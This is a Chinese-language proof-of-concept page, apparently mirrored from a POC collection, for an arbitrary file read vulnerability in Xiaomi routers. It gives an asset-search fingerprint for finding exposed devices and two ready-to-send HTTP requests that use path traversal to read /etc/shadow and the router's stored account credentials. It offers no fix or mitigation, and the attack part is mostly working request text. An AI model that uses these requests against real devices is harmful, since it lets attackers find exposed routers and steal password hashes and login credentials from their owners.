admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/小米/小米路由器任意文件读取漏洞.md

40 lines
1.4 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 小米路由器任意文件读取漏洞
# 一、漏洞简介
小米路由器是一款高配的智能路由器,具备强大的扩展,并且具备高速传输的特点,其传输速度最高可以达到866M,相比普通150M/300M的普通无线路由器具备更高无线传输速率。小米路由器系统任意文件读取漏洞
# 二、影响版本
+ 小米路由器
# 三、资产测绘
```plain
app="小米路由器"
```
![1717231971362-917b53db-2985-4d7c-8a42-118940873a2c.png](./img/Qww4sdoQYgfh-0gQ/1717231971362-917b53db-2985-4d7c-8a42-118940873a2c-622952.png)
# 四、漏洞复现
```plain
GET /api-third-party/download/extdisks../etc/shadow HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
```
![1717231994318-8206991d-9a44-4abd-9620-1259bfb61336.png](./img/Qww4sdoQYgfh-0gQ/1717231994318-8206991d-9a44-4abd-9620-1259bfb61336-319945.png)
读取登录密码
```plain
GET /api-third-party/download/extdisks../etc/config/account HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
```
![1717233232303-77763c87-be53-47c2-9d2d-07df3e961f46.png](./img/Qww4sdoQYgfh-0gQ/1717233232303-77763c87-be53-47c2-9d2d-07df3e961f46-241369.png)
> 更新: 2024-06-11 10:30:33
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/slv3fogu0wvlvht3>
Reference in New Issue Copy Permalink